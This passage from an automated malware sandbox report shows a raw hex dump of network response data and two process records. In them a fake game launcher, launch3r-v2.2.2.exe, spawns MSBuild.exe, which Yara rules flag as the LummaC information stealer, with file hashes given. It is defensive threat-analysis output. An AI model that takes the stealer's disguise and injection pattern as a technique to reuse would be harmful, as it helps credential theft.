                                          2025-04-11 23:45:14 UTC1055INData Raw: 3e 26 03 cf 58 6d 9c a8 34 55 dc 8a a0 5c 10 ca 76 87 7e 8c 70 a6 39 c5 70 53 6e 1b a2 ed bc f4 a8 b5 7a de 12 b7 ce f4 07 fa 6e aa 7c c3 6c f7 77 2f 7e 27 eb 60 1e b7 19 f7 b7 c6 de 91 64 07 0c c6 ef c3 b5 5d ab a9 0c e8 a1 42 da c9 4a f7 3e 4f 12 d8 71 f6 4c 8e ed 8c 8f 72 00 64 e4 0a 8f 7c c7 ab cd 31 70 6d 79 02 57 98 e4 a6 20 8f 1d fa a5 bb 51 56 3b b8 5b da 44 27 5f 74 1b 60 c8 07 54 6e 97 3f b3 c3 66 d3 19 aa f4 28 e2 95 b5 fd da 6f c0 5a a0 82 1b 18 ad b8 57 27 06 e8 e2 1a e0 75 b3 17 bf df c9 b5 70 3b 70 68 b5 e7 ba 39 18 2a c0 f2 6a b7 8f 8f c3 70 b6 e8 47 ac ff 6b cf c1 d0 61 e8 ef 5b 23 0f 14 77 28 1d f3 3b 17 47 a6 2e f5 54 e7 f6 8d 9f 09 f2 cd 85 b3 de 68 cb 16 41 23 3c 93 0f 97 ab 3d e4 e4 48 68 16 77 28 1a 53 71 99 09 0b b6 84 a8 a4 5a 39
                                          Data Ascii: >&Xm4U\v~p9pSnzn|lw/~'`d]BJ>OqLrd|1pmyW QV;[D'_t`Tn?f(oZW'up;ph9*jpGka[#w(;G.ThA#<=Hhw(SqZ9


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:19:44:54
                                          Start date:11/04/2025
                                          Path:C:\Users\user\Desktop\launch3r-v2.2.2.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\launch3r-v2.2.2.exe"
                                          Imagebase:0x7ff692cf0000
                                          File size:1'577'984 bytes
                                          MD5 hash:2151FA14DB38F5B760138EF434CF19DB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:19:44:58
                                          Start date:11/04/2025
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          Imagebase:0x630000
                                          File size:262'432 bytes
                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2515196932.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2512778341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          Reset < >